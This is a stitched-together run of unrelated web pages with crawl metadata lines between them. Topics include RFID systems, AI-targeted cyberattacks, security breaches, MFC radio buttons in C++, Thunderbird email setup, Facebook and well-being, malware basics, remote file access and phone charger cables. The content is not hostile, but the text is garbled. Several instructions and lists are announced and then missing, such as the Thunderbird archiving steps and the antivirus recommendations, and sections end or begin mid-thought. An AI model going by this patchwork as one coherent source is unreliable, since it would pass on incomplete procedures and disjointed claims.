A common example of an RFID system is pet microchipping. A pet microchip is embedded in a pet’s skin after it is adopted and stores information about the pet and its owner. This chip can then be scanned to identify the owner if the pet gets lost.
How Does RFID Work?
RFID technology works using radio waves and signals to collect and transfer data. When an RFID scanner is used, it sends out a signal, which the RFID tag picks up and responds to. The tag then sends out its encoded data over radio waves to the scanner. The scanner picks up these waves, converts them into useable data and transfers the data from the tags to a host computer system to store and analyze the collected data.
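As a rough sketch of that host-side step, the snippet below collapses a stream of raw tag reads into a de-duplicated count; the tag IDs and timestamps are invented placeholders.

# Turn repeated reads of the same tag into a single inventory entry.
from collections import Counter

raw_reads = [
    ("E200-0001", "2024-01-01T10:00:00"),
    ("E200-0001", "2024-01-01T10:00:01"),   # same tag seen twice by the reader
    ("E200-0002", "2024-01-01T10:00:01"),
]

unique_tags = {tag for tag, _ in raw_reads}
print(f"items detected: {len(unique_tags)}")          # 2
print(Counter(tag for tag, _ in raw_reads))           # read counts per tag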
Specific RFID systems differ primarily in the types of tags used in the system. These are primarily organized by frequency range and whether the tag is active or passive:
- Low-frequency: Low-frequency RFID systems have shorter ranges and read data more slowly, but work well in environments with heavy interference from liquids and metals. These systems are commonly used in livestock management.
- High-frequency: High-frequency systems have longer ranges and faster data reading capabilities compared to low-frequency systems and are often used in hotel key card systems, payment cards and security systems.
- Ultrahigh-frequency: Ultrahigh-frequency RFID systems are used in situations that require extremely fast data transfer. Common examples include retail inventory management and anti-counterfeiting systems.
- Passive: Passive tags do not have their own substantial energy source. Instead, they use energy from the RFID scanner to reflect back a signal.
- Active: Active tags contain their own energy source and broadcast their signal at regular intervals, which a local RFID scanner can then pick up.
The type of tag system used largely depends on the needs of the specific application.
In theory, RFID technology is similar to barcoding in that a product is scanned to collect information. However, RFID tags are actual microchips that carry data, while a barcode simply encodes a reference to data stored elsewhere. Also, RFID chips can be scanned at a distance without a line of sight. These two qualities mean that RFID chips do not rely on a separate data lookup and are faster and easier to scan than traditional barcodes.
Benefits of RFID
RFID systems offer benefits to a range of industries and can be implemented in businesses of all sizes. Some of the key benefits for businesses include the following:
- Improved inventory tracking and management: Tracking assets and materials is a key function in any business at any point in the supply chain. RFID systems offer a faster and more reliable way of tracking items, as they allow multiple items to be scanned at once instead of counting or scanning individual items.
- Reduced labor investments: RFID systems automatically scan items and upload information into a computer system. With proper setup, this can remove the need for manual scanning, tracking and data entry, allowing labor to be redistributed to more value-adding functions.
- Maximized accuracy: By automating data collection and entry, RFID can minimize the potential for costly human error, such as transcription errors, data duplication and deletions.
- Enhanced traceability: Because RFID tags can be updated, they can track which processes a product has gone through. For example, an RFID tag can be updated when its associated product goes through inspection. Then the distribution center may verify that every product has gone through an inspection before sending out products to customers.
- Shortened turnaround: Integrating automated RFID processes can streamline processes by eliminating time-expensive scanning and tracking procedures, shortening turnaround times for customers.
- Improved revenues: By reducing labor costs and losses and maximizing efficiencies, RFID systems can quickly improve revenue, which offsets the implementation costs.
Businesses of all types can experience these benefits, and many industries are exploring the potential applications of RFID in new sectors. For example, the medical industry has been researching the benefits of applying RFID to improve workflows and prevent medical errors. Studies found that the use of tags with RFID technology in medical settings helped match medication with patients, streamlined physician workflows and even reduced instrument loss.
RFID is on the rise in a range of industries, most notably in retail, manufacturing and transportation. Applications of RFID today primarily focus on asset tracking, access control, payment systems and supply chain tracking, but new applications are emerging as the technology makes headway in more industries.
If you’re thinking of implementing RFID in your business, you’ll want to know what the process looks like. Here are the general steps for implementing an RFID system:
- Compare vendors: Find an RFID vendor that has experience working with companies similar to yours. If you’re a small business, look for vendors that have experience working with small companies.
- Identify applications: Determine where your business can benefit from RFID. Focus on one area at a time and determine what processes will need to be changed to facilitate implementing RFID. Once you have a plan, organize implementation into stages with your vendor’s help.
- Choose a system and equipment: Select a system frequency — low, high or ultrahigh — that meets the needs of your business, then select equipment that supports your business and processes. Work with your vendor to determine what types of tags, scanners, encoders and software will work best for your needs.
- Implement RFID in stages: Once your equipment arrives, test it thoroughly before deployment with the help of your vendor. Once you’ve worked out any major bugs or questions, begin with your step-by-step implementation plan.
To better understand RFID implementation and the common mistakes to avoid, download our “Five Mistakes to Avoid” article.
RFID Solutions From DataSpan
If you’re interested in implementing your own RFID system or improving an existing one, DataSpan is here to help.
Our tailored RFID solutions enable businesses to collect the data they need to make critical business decisions and leverage RFID to the fullest. We analyze existing applications and processes in a range of fields to help our customers get the most out of their RFID systems. We’ll match you with the optimal tags, hardware, software and professional services you need to develop an integrated and scalable RFID solution. From system design services and training to installation and integration, DataSpan is here to help.
Contact DataSpan today to learn more about our RFID solutions. | <urn:uuid:4e707440-dd49-469c-9a50-00e9eb731290> | CC-MAIN-2022-40 | https://dataspan.com/blog/radio-frequency-identification-rfid/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.917677 | 1,709 | 3.203125 | 3 |
Artificial intelligence (AI) has created new possibilities for business organizations. The ability to automate and augment human intelligence has allowed organizations to:
- Transform operations
- Adopt new business models
- Understand customer behavior
- Predict cyberattacks
With these capabilities, organizations are able to adapt their operations and prepare for the challenges and opportunities—before they occur.
Unfortunately, artificial intelligence has also empowered cybercriminals. Taking advantage of sophisticated and intelligent technology solutions, they can:
- Find loopholes in corporate IT networks
- Launch large-scale Denial of Service (DoS) attacks
- Counter the limited security capabilities of an average organization.
Cyberattacks that harness AI might be the biggest threat facing organizations today—so let’s take a look at how this changes the enterprise cybersecurity landscape.
Modern cyberattacks attack data
Until recently, many cyberattacks were intended to compromise networks and access sensitive information. These stats are beginning to tell a newer, bigger story:
- In the first six months of 2020, 36 billion data records were compromised.
- Only 5% of an organization’s files are protected, on average.
- The average data breach costs $3.86 million in damages. That cost is bound to increase thanks to prevailing stringent regulations, like GDPR, that impose financial penalties on organizations failing to adopt the necessary security measures.
- It takes 200 days+ on average to first identify a security breach and up to 280 days to contain the damages.
Now consider the size of our digital universe, the big data that represents the opportunity for business organizations to leverage AI solutions in making well-informed decisions. We have already produced 44 zettabytes (44 × 10^21 bytes) of data. By the year 2025, we expect to have generated 175 zettabytes of information.
So, what does this big data mean for attackers? The threat surface just got exponentially bigger. Consider these AI adoption trends:
- 58% of the respondents believe they have used AI in at least one of the business functions (McKinsey).
- The number of organizations adopting AI technologies has increased by more than 270% since 2015 (Gartner, 2019).
- More than 50% of the organizations reported improvement in productivity due to AI technology investments (PWC, 2018).
- The global AI market is expected to reach $327.5 billion by 2021, at a year on year growth of 16.4% (IDC).
These trends have given rise to a new form of cyberattack threat vertical: AI cyberattacks.
What are AI cyberattacks?
AI cyberattack is the term for any offensive maneuver launched against:
- AI systems
- The data processing pipeline
Most AI practitioners excel at making sense of the available information, but they are rarely security experts who can protect their systems and data. Cybercriminals have found ways to compromise these systems, which has led to the concept of adversarial AI. This type of cyberattack jeopardizes the ability of data and AI systems to deliver the promised value to the business.
Common types of AI cyberattack
According to Gartner:
Through 2022, 30% of all AI cyberattacks will leverage training-data poisoning, AI model theft or adversarial samples to attack AI-powered systems.
In an effort to understand and mitigate potential threats, let’s look at these three AI-focused attack models.
AI model theft
AI model theft is the reverse engineering or hijacking of AI models. Once a model is trained and embedded on a vulnerable hardware chip or a cloud network, cybercriminals can:
- Access the AI systems
- Reverse engineer the machine learning (ML)/AI models
Confidential AI models are also being deployed on public networks accessible through API queries. Algorithms can also be reconstructed based on the data being ingested and delivered as an output from deployed models.
Adversarial samples are inputs containing small, deliberately crafted feature perturbations that cause a trained AI model to classify them incorrectly. The samples are counterfactual, and the ML model fails to interpret them correctly. As a result, the model becomes a source of incorrect classification decisions.
For example, consider a self-driving Tesla that is designed to slow down ahead of a stop sign. If the stop sign is manipulated or painted in another color, the car may fail to recognize the sign.
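To make the idea concrete, here is a toy Python sketch of an adversarial perturbation against a simple linear scorer; the weights, input and step size are made-up numbers, not a reconstruction of any real attack.

# A small, targeted nudge to each feature flips the classifier's decision.
import numpy as np

w, b = np.array([1.5, -2.0, 0.5]), 0.1       # toy linear "model": score = w.x + b
x = np.array([0.2, 0.1, 0.4])                # legitimate input; score > 0 -> class A

def score(v):
    return float(w @ v + b)

eps = 0.3                                    # size of the per-feature perturbation
x_adv = x - eps * np.sign(w) * np.sign(score(x))
print(score(x), score(x_adv))                # 0.4 vs. -0.8: the decision flips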
Training-data poisoning is the manipulation of training data that AI practitioners use to train the model.
Once cybercriminals gain unauthorized access to the storage network, they can alter the data or introduce significantly different data sets that are fed to the learning model, together with the original data.
Unlike the classical adversarial attack that manipulates the inputs fed to an already trained model, machine learning data poisoning targets the training information fed to the model. Only a few highly skewed samples of input data are needed to manipulate the learning of the model itself, which is a benefit for the cybercriminals. Once an ML model is trained on the poisoned data, especially in the case of unsupervised learning models, you'll likely require deep AI expertise to identify possible issues with the training data.
For instance, the accuracy and loss of a compromised model can shift noticeably when it is tested against uncorrupted datasets.
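The effect can be illustrated with a toy example in which a handful of attacker-injected points drags the decision threshold a simple classifier would otherwise learn; all numbers below are invented for illustration.

# Compare the midpoint threshold learned from clean data vs. poisoned data.
import numpy as np

np.random.seed(0)
clean_a = np.random.normal(0.0, 0.5, 200)    # feature values for class A
clean_b = np.random.normal(3.0, 0.5, 200)    # feature values for class B
threshold_clean = (clean_a.mean() + clean_b.mean()) / 2

poison = np.full(20, 8.0)                    # outliers injected with an A label
poisoned_a = np.concatenate([clean_a, poison])
threshold_poisoned = (poisoned_a.mean() + clean_b.mean()) / 2

print(round(threshold_clean, 2), round(threshold_poisoned, 2))  # boundary shifts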
Planning for AI cyberattacks
Being aware of AI cyberattacks is the first step in preventing them. Security best practices encourage categorizing every potential threat into one function of the CIA triad, the most essential IT security concept. The MITRE ATT&CK Framework is a free resource that can also help inform your risk management practices. | <urn:uuid:b646848a-e26b-4f9b-92a2-448d82c61760> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/artificial-intelligence-cyberattacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.921937 | 1,169 | 2.546875 | 3 |
As of today, security is a hot topic not just for the IT industry but for almost everyone. From personal mail accounts to data encryption, everyone has something valuable to protect. When we 'protect' something, we build a physical and/or virtual system that hinders unauthorized viewers and users. And when that system fails to stop an intruder, a security compromise happens. In more technical terms, a security compromise (breach, violation) is an incident that results in unauthorized access to data, applications, services, networks and/or devices, often by bypassing their security mechanisms.
With a security compromise, confidential data is exposed to unauthorized people, which is likely to have an adverse effect on the organization's reputation, legal standing and, of course, revenue. In other words, it is essential for an organization to avoid security compromises. But how? Well, first you need to take a closer look at the different types of security compromise.
These terms are often used interchangeably, but it is beneficial to bear in mind that they are in fact two different things. The nuance is usually in the order. A security breach happens first, when an unauthorized user gains access to the system. A data breach then happens when that user views, alters or copies the data. Yet there is one exception: a company may accidentally expose data, which is considered a data breach as well.
Cybercriminals often use malicious software to gain access to protected networks. Viruses, spyware and other types of malware usually find their way into your system through e-mails or downloads. To avoid harm from such attacks, you need strong anti-virus software or a firewall. Additionally, educating your employees on not opening strange e-mails or not downloading content from untrusted sources will go a long way.
No executive likes to think that a member of their team would expose sensitive information, yet up to 28% of enterprise data security incidents come from inside, according to PWC's 2014 survey. Thus insider malice must be considered along with everything else. But how can we prevent it? Firstly, we must remember that most malicious insider attacks happen in the 30 days before and after an employee's last day.
That is why you must be strict and punctual when it comes to removing an ex (or soon-to-be ex) employee's access to your company's e-mail servers, VPN and other resources. Moreover, be alert to red flags raised by your employees. To prevent unintentional breaches from inside, you can block access to USB ports. This can prevent intentional theft and unintentional leaks. And finally, as a principle, never give an employee more access rights than they need to do their job properly.
Passwords are the oldest and most widely used authentication mechanism. Yet it takes somewhere around ten minutes to crack a six-character password that's all lowercase letters. If you capitalize some of them, it will take 10 hours. If you sprinkle in some symbols and numbers, you will create a monster that will withstand at least 18 days. Long story short, change all passwords regularly and make them as complex as possible.
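A back-of-the-envelope sketch shows why each extra character class helps. The assumed rate of 500,000 guesses per second is purely illustrative; real cracking speeds vary widely with hardware and hashing.

# Keyspace for a six-character password grows with the alphabet size.
GUESSES_PER_SECOND = 500_000

for label, alphabet in (("lowercase only", 26),
                        ("upper + lower", 52),
                        ("letters, digits, symbols", 94)):
    keyspace = alphabet ** 6
    hours = keyspace / GUESSES_PER_SECOND / 3600
    print(f"{label:>24}: ~{hours:,.1f} hours to exhaust")   # ~0.2, ~11, ~383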
A social engineer works their way into an organization by taking advantage of the natural desire to help others. For instance, they convince an employee that they have lost access to their account. This can manifest itself as a call to the help desk or an e-mail to customer services. An employee can fall prey to this attack and give out information that can be used to access the company's sensitive data. To avoid this 'phishing' scheme, take some common-sense precautions that require the caller or phisher to prove their identity. Adding such steps to the protocol is a very easy thing to do, yet it prevents some serious breaches.
Every day hackers come up with new ways to break in, so you need to stay informed and updated. Always update your software to the latest versions. Keep your staff and, if necessary, customers informed. Monitor online accounts. Look for a service that can help you keep track of this information.
CIA stands for Confidentiality, Integrity, and Availability, also known as CIA triad. It provides various security controls to ensure data...
The integrity of a file can be checked through a Cryptographic Hash Function or Digital Signature. | <urn:uuid:fb098861-193f-4a4f-b8dc-deb9ad70ddd2> | CC-MAIN-2022-40 | https://www.logsign.com/blog/what-is-a-security-compromise/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.938926 | 898 | 2.578125 | 3 |
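For example, a minimal integrity check compares a file's SHA-256 digest against a known-good value published by the file's author; the path and digest below are placeholders.

# Hash a file in chunks so even large files can be checked.
import hashlib

def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# print(sha256_of("backup.tar.gz") == "expected-hex-digest-goes-here")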
Radio Buttons in MFC (Visual Studio 2008 / C++)
This is a quick and dirty description of how to use radio buttons in MFC, written because I could not find this information in a single place on the web.
In the dialog editor:
- Create a new group with the group box control and set a meaningful caption
- Add radio button controls inside the group
- The radio buttons must have ascending tab order
- The first radio button (in tab order) must have the property “Group” set to True
- All other radio buttons must have the property “Group” set to False
It should look similar to this:
In the header file defining the dialog class:
- Add a member variable of type int that will store which radio button is selected (none: -1, first: 0, second: 1, and so on).
In the cpp file implementing the dialog class:
- In the constructor initialize the member variable (with 0)
CDialogConfig::CDialogConfig(CMainFrame* pMainFrame) : CDialog(CDialogConfig::IDD, pMainFrame), m_nLEDType(0)
- In DoDataExchange add a call to DDX_Radio similar to the following (where IDC_RADIO_LEDTYPE1 is the ID of the first radio button):
DDX_Radio(pDX, IDC_RADIO_LEDTYPE1, m_nLEDType);
When you want to read which radio button is selected:
- Call UpdateData with a parameter of true (indicates reading):
UpdateData(TRUE);
- After UpdateData has been called, the member variable (m_nLEDType in this example) has the current state of the buttons.
When you want to select one of the buttons programmatically:
- Set the member variable to the correct value (none selected: -1, first button selected: 0, second button selected: 1, and so on)
- Call UpdateData with a parameter of false (indicates writing):
UpdateData(FALSE);
Thunderbird is an open source email client made by Mozilla (who also make the Firefox browser). It is available for Windows, OS X and Linux. This article explains how to configure an email account in Thunderbird and how you can archive email locally.
When you first launch Thunderbird you will be greeted by a set-up wizard, which will guide you through setting up an email account. You can also configure an email account via the Accounts menu. We will show you both ways by setting up two email accounts.
For the wizard set-up we will use the email address email@example.com, which lives on our Strawberry server. On the first screen you need to enter three bits of information: your name, the email address and the password for the account.
Image: Thunderbird’s account set-up wizard.
You almost certainly want to keep the Remember password checkbox ticked (unless you like the idea of entering your email password every time Thunderbird connects to the mail server).
After you click on Continue Thunderbird will try to find the configuration settings for the domain. Unfortunately, it will come up with the wrong results. You therefore need to manually enter the settings, which you can by clicking on the Manual config button.
Image: Thunderbird’s incorrect guess at what the email settings should be.
After clicking the Manual config button you can manually enter the incoming and outgoing server names and the username.
For the incoming server we recommend using IMAP but you can use POP3 if you prefer. The server hostname should be the hostname of the server, which in our case is strawberry.active-ns.com. If you are not sure what hostname you should use, you can find this information via the Connect Devices option in cPanel.
If you are using IMAP then the port number should be 993. Use port 995 instead if you want to use POP3. In both cases Thunderbird will automatically set the type of security used to SSL/TLS. You can leave the authentication setting set to Autodetect.
The outgoing (SMTP) server should also use the server’s hostname, and the port number should be 465. Again, the type of encryption is SSL/TLS and the authentication method can be set to Autodetect.
On the last line you need to enter the username you use to connect to the mail server. By default, Thunderbird will use the username without the domain part (i.e. it will suggest using just the part before the @ sign rather than the full address). You need to make sure that the username is your full email address.
Image: entering the incoming and outgoing server settings and the username.
When you have entered the settings you can click the Re-test button. Thunderbird will check if the settings work, and if so you can next hit the Done button.
And that should be it! You should now see your email account.
You can add a second email account by clicking on the hamburger menu in the top-right corner and selecting Preferences > Account Settings. At the bottom of the left-hand pane you can click on Account Actions and then select Add Mail Account.
Image: adding a new email account via Thunderbird’s Account Settings.
You should now see the account set-up wizard again. After adding the second email account both accounts will show in your Thunderbird.
In the below screenshot you can see the two email accounts we configured. We have selected the inbox for email@example.com, and below that you can see the firstname.lastname@example.org mailbox (which is collapsed).
Image: two email accounts in Thunderbird.
There is a third folder in the left-hand pane as well: Local Folders. This is a special folder used for archiving emails. Any emails stored under Local Folders are no longer on the server, but they are still available locally, via Thunderbird. You can view emails in the folder as per usual, but the emails are only accessible in Thunderbird (and not on, say, a mail app on a smartphone).
Thunderbird's default way of archiving emails is a little odd. By default Thunderbird stores emails you archive in a folder named Archives. That folder lives in your mail account on the server, which defeats the purpose of archiving emails if you want to reduce the amount of space used by your email account, as the emails will still be stored on the server.
You can correct the default settings as follows:
When you now archive an email it will be stored in an Archives folder under Local Folders.
Image: the Archives folder now lives under Local Folders.
Thunderbird's archive folders organise email by year. For instance, as you can see in the above screenshot, the single email we archived is stored in a subfolder named 2019. Many people prefer a more custom way of organising archived emails. Doing so is fairly straightforward: you create custom folders under Local Folders.
In the below screenshot I have created a folder for the info@ and nospam@ mailboxes under Local Folders. Each folder has a number of subfolders. For instance, the Info folder has two subfolders: Chess and Work. You can create custom folders by simply right-clicking on Local Folders and selecting New Folder.
Image: custom folders under Local Folders.
The advantage of this approach is that you can archive emails to specific folders. All work-related emails can go to the Work folder, while chess-related emails are kept in the Chess folder. There is a downside to this approach though: you will need to manually archive your emails. Luckily, that is straightforward enough:
Alternatively, you can do the following:
Thunderbird is a full-featured email client, and it is beyond the scope of this knowledgebase article to fully document the application. A good starting point for learning more about Thunderbird are the project’s support pages. | <urn:uuid:2ebc2fcf-e070-4074-8594-e1a3e67cad97> | CC-MAIN-2022-40 | https://www.catalyst2.com/knowledgebase/email/setting-up-an-email-account-in-thunderbird/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00193.warc.gz | en | 0.88252 | 1,222 | 2.671875 | 3 |
Is social media evolving into an antisocial medium? Days after one of its former execs argued that the answer is yes, Facebook published a post addressing the issue.
“I think we have created tools that are ripping apart the social fabric of how society works,” Chamath Palihapitiya, who once served as vice president for growth at Facebook, told an audience at the Stanford Graduate School of Business last week.
“The short-term, dopamine-driven feedback loops we’ve created are destroying how society works,” he maintained.
There is a lack of civil discourse and cooperation on social media, as well as widespread distribution of misinformation and mistruth, according to Palihapitiya.
“It’s not an American problem,” he said. “This is not about Russians ads. This is a global problem.”
Good and Bad Social Media
Some people feel bad after using social media, but others do not, wrote Facebook Director of Research David Ginsberg and Research Scientist Moira Burke.
“According to the research, it really comes down to how you use the technology,” they said.
“For example, on social media, you can passively scroll through posts, much like watching TV, or actively interact with friends — messaging and commenting on each other’s posts,” Ginsberg and Burke pointed out.
“Just like in person, interacting with people you care about can be beneficial, while simply watching others from the sidelines may make you feel worse,” they explained.
Wellness Through Better New Feeds
To help foster interaction, Facebook has made a number of changes to its services, Ginsberg and Burke noted.
For example, it has started demoting clickbait headlines and false news, and prioritizing posts from people users care about to foster more meaningful interactions and reduce passive consumption of low-quality content.
It also added a “snooze” feature allowing users to hide posts from a person, group or page for 30 days.
Take a Break is another tool designed to remove stressful content. It gives users more control over when they see an ex-partner, what their ex can view, and who can look at past posts about the relationship.
In addition, the company has launched several suicide prevention initiatives, the Facebook researchers wrote.
Facebook has invested US$1 million toward research to better understand the relationship between media technologies, youth development and well-being, they added.
Facebook’s acknowledgment that there’s more to social media than fun and sharing, and its moves to address the darker aspects of its community may not be entirely altruistic, suggested John Carroll, a mass communications professor at Boston University.
Still, "it's a sign their awareness of bad PR has started to rise," he told TechNewsWorld.
“Many people think these steps are largely cosmetic. I don’t see a lot of newfound enlightenment in Mark Zuckerberg these days,” Carroll added. “He’s in a position of influence and importance in the world that he doesn’t want to face up to.”
Two Sides to Interaction
Social media can both foster and inhibit interaction, asserted Karen North, a professor of digital social media at the University of Southern California.
“It can extend out social interactions to times and places when we wouldn’t otherwise be able to interact with each other,” she told TechNewsWorld.
“Usually to interact with people, you need to be in proximity to each other,” North explained. “Social media allows us to be together even when we are physically apart.”
However, social media interaction differs from proximity interaction because it’s done through a device and involves content creation.
“That can interfere with people interacting more personally,” North said.
Avoiding Social Media Blues
There are a number of ways for individuals to avoid the potential negative consequences of social media, said Brian Primack, director of the University of Pittsburgh Center for Research on Media, Technology and Health.
There is a connection between increased depressive symptoms and an increased proportion of social media friends you don't know in real life relative to those you do know, he noted.
“We also found that your mental health is better if you report that a higher proportion of your friends is what you would consider ‘close’ friends,” Primack told TechNewsWorld.
Limiting the number of social platforms you participate in can be beneficial, as the number of platforms a person uses can be a predictor of poor mental health, he observed.
Establishing strict guidelines for when and where you use social media may be helpful, Primack ventured.
“Many families are declaring evening time to be device free,” he noted. “They have everyone in the family drop their devices in a box at the front door, so that everyone can really focus on each other during a family dinner and other evening activities.” | <urn:uuid:f50e2b19-9fe4-4e30-9077-0cab9628d6bc> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/social-media-or-social-disease-85019.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00193.warc.gz | en | 0.94139 | 1,061 | 2.609375 | 3 |
Malicious software, commonly known as malware, is software that negatively impacts your PC. Malware has been around almost as long as computers have. While the majority of programs you download or install on your PC are safe, some software was created to cause harm to you and your PC. One may ask: how can a program cause me harm? The malware itself cannot physically hurt you, but its design can cause you a lot more harm than just the physical kind.
For instance, there is malware designed to steal your information, destroy your files or, even worse, extract payment from your bank account. Whatever the intent of the malware's creator, that's what the effect will be on you or your PC. People place malware on other people's PCs for many reasons: some do it for fame, others to extract a ransom, and others simply to cause damage to their target, much like someone who commits vandalism or arson.
Malware comes in many forms, like viruses, spyware, rootkits, ransomware, etc. It is common practice to use 'virus' and 'malware' interchangeably, but a virus is just one type of malware. In this article, we will talk about how your PC gets malware, what happens when your PC is infected with malicious software, ways to avoid getting it, and how to eliminate it.
Unfortunately, malware is often identified only when your PC has already been infected. With malicious software, a good question to ask is "What has changed on your PC?" Is there a piece of software you have downloaded, or a particular site you have visited that asked you to accept a pop-up?
One might say that they haven't been on any strange websites, and that most of the websites they visit are safe. While that might be the case on the face of it, there are many websites that you click on, maybe just to check some quick information from Google. But that site you visit for just a few seconds might have malware embedded in it. Your computer might not change in any visible way, but the malware is being installed and running in the background.
Another trick that scammers love to use is a fake warning that comes up on your screen saying "WARNING - Your Computer is Infected With a Virus, click here, install our software to help you clean it." What you're doing at this point is installing the malware on your PC yourself. The scammers are tricking you into installing malware; that type of manipulation is called social engineering, where criminals exploit your natural inclination to trust.
Yet another way a PC can get infected with malware is by opening a file that is infected. It could happen when malware is placed on a USB drive, and by using this USB drive you get malware on your PC. It can also be transferred through email, which is the number one way of getting infected by malicious software. You open up a file sent to you via email, and just by accessing that file your PC gets infected. This situation is even trickier if your job requires you to open files sent to you by strangers, like an HR department where individuals send you their resumes daily. Your responsibility would be to open these files to read the information. All of these are ways that one can get infected by malicious software.
There are several effects that your PC can experience when you are infected. Some malware is so minor and so barely noticeable that you could be infected for years and not even realize it's there. Some variants simply show an extra advertisement at the bottom of your computer screen; you close the advert and it stops until a later time. That type of malware may not be very intrusive, but it consumes RAM on your PC, may pop up advertisements that do not behave properly, or might simply be bothersome to keep closing every once in a while.
Other malware can delete your documents. For instance, you might have photos stored on your PC; then malware gets installed and deletes all of them. You go to the folder where you normally store photos and, when you check, there are no photos there. It can go so far that when you do upload photos, they simply disappear after a day or two. That is a sign of malicious software on your PC.
Some malware will start doing what is called "thrashing the hard drive". The program reads your hard drive as hard and fast as it can, hitting the same sector over and over again to try to cause a failure. This attack can cause your hard drive to fail or your CPU to burn up. This kind of software is designed to wear out components on your computer and is a very aggressive form of malware.
There is yet another type of malware called "keyloggers"; these are the silent type. They run in the background, record every key you press on the keyboard, and send the keystrokes to a server. Whoever has access to that information can see when you log in to a particular site and use the recorded username and password to get into your various accounts. Malware can also show you a fake web page instead of the real one and manipulate you into entering your information there.
One of the main things that happens when your PC is infected with malware is that your PC becomes a transmitter. If you are on a corporate network that hosts 500 PCs, it only takes one PC to get compromised, and then every PC on that network can potentially be compromised because of that one machine.
A popular type of malware these days is ransomware. When this type of malware affects your PC, it takes the form of a ransom demand. The program does not delete your files; instead, it encrypts all your data. Once encrypted, you can no longer access your data. The data is still there, but to decrypt it the attacker demands that you pay a certain amount. The reason why this type of malware is so popular is that attackers can directly monetize it; other kinds of malware don't necessarily bring them a direct monetary value, but this one does.
Eliminating malware revolves around utilizing software with the capability to identify, quarantine, and delete it. Most of the time this means an antivirus tool.
Antivirus Software - There is a lot of antivirus software out there that does an amazing job of eliminating malware on your PC. According to USNEWS, these are the best antivirus software products for 2021:
Antivirus software protects against these types of threats by performing key tasks like:
A good antivirus is truly your go-to tool for eliminating malware.
In conclusion, malware has been around for a long time and will continue to exist as long as computers do. So let's do all we can to be mindful of what malware is, how we get infected by it, and how to eliminate it.
During the pandemic, many professionals had to switch from working at their offices to working at home. In many cases, their office computers would have all the necessary tools, software, and features to perform their day-to-day tasks. If you are working from home with large files or proprietary formats like CAD or graphics design files, then getting that same level of efficiency from a home computer may appear difficult.
Moreover, if you're part of a team that needs access to one particular file at the office, then working from home may make it seem impossible to collaborate with team members on this file.
Nevertheless, rest assured, accessing your large work files from home is very achievable. Whether you are downloading a lot of data at once or working on your office PC from home, there are plenty of ways to ensure you have access to your files from anywhere.
In this article, we will discuss 3 ways to access your work files remotely.
Remote Desktop Protocol (RDP) is a Microsoft operating system feature that allows a user to connect to another computer over a network connection. It lets you access a separate device from the one you are using, as if you were sitting in front of it in person.
The computer that you are remoting into becomes a window on your PC screen, allowing you to access all of the programs and files stored on that computer. You can be at home, or anywhere with internet connectivity, and still reach the computer you have connected to.
To use RDP you must be running a Microsoft operating system. The official client is Remote Desktop Connection, which comes preinstalled on all Windows systems.
The Remote Desktop Protocol is a safe and free method to access your large files from your home environment.
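Before starting a session, it can help to confirm that the office machine is reachable on RDP's default TCP port, 3389. A minimal sketch in Python; the office hostname below is hypothetical:

```python
import socket

def rdp_reachable(host: str, port: int = 3389, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to the RDP port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

print(rdp_reachable("office-pc.example.com"))  # hypothetical office hostname
```

Keep in mind that exposing port 3389 directly to the internet is risky; most organizations put RDP behind a VPN or a remote desktop gateway.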
Remote access software allows one PC to control or view another PC from anywhere with internet connectivity. Much like Microsoft's Remote Desktop software, these applications let you use other PCs as if you were physically behind the screen. However, unlike Microsoft's tool, these applications can work on either Windows or macOS, so you can easily access files between any machines. Remote access tools generally provide a common set of basic features.
Setting up remote access software generally takes a few minutes, with each product offering a specific feature that makes it stand out from the others. You can get a comprehensive list of the best remote desktop software on G2's website.
These apps, as well as many others, are available for accessing files remotely, offering cloud solutions and protected access.
Desktop virtualization allows a user to simulate a workstation load from a connected device, remotely or locally. Simply one of the best methods on our list, virtualization is a technology that separates the desktop infrastructure from the physical client device used to access it. There are two main types of desktop virtualization, depending on whether the operating system instance runs locally or remotely.
Remote desktop virtualization allows an IT department to have better control over software and desktops using virtual machines, and it brings several benefits.
Desktop virtualization is getting increasingly simple, with businesses reaping tremendous benefits from its use. Workplaces are becoming more productive, and as the work environment constantly changes, you need a robust infrastructure that is able to adapt. At ACT360 we offer virtualization services for when performance, ease of use, and the ability to work quickly are the main goals. We work with you to bring you the best virtualization service possible.
Accessing large files remotely is becoming increasingly necessary as businesses move into a work-from-home environment. Employees need to be able to access their data anytime, anywhere, and from almost any device. We discussed three ways to access those large files remotely.
Remote Desktop Protocol, which uses Microsoft's remote desktop protocol to access other Windows desktops.
Remote access software: applications that let you remotely access other PCs that have the server component installed, share the clipboard, and either simply view the other machine or take full control of it.
Desktop Virtualization, which makes it possible to access an entirely different computer with optimal protection, enhanced features, and performance.
We all forget stuff. I forgot how old my Mom was a few days ago, so I just put “Happy 35th birthday” in a card and called it quits.
Everyone laughed, and now I’m out of the will.
Maybe you’re forgetful, too. Are you reading this with only 9% battery because you forgot to charge your device last night? Are you hoping one of your co-workers has a cable you can borrow?
Let's say you have a Samsung A10. Adam over there has a cable he picked up at the gas station for $2 that he's using to charge his iPhone 7. Marcus has the original cable that came with his Huawei Mate 30 Pro.
So who's it going to be? Which phone charger should you borrow?
First, let’s explore what’s actually inside a phone charger cable.
A lot of engineering goes into cables – they’re not just strings of metal wrapped in rubber with an end that fits in your phone.
Inside the little plastic “heads” of OEM cables are small circuit boards and resistors. These not only protect your data, but also protect your device from surges. They’re there to make sure the cable is operating at peak efficiency.
Adam’s gas station cable is so cheap because it likely doesn’t have any of those circuit boards, whereas Marcus’ cable does.
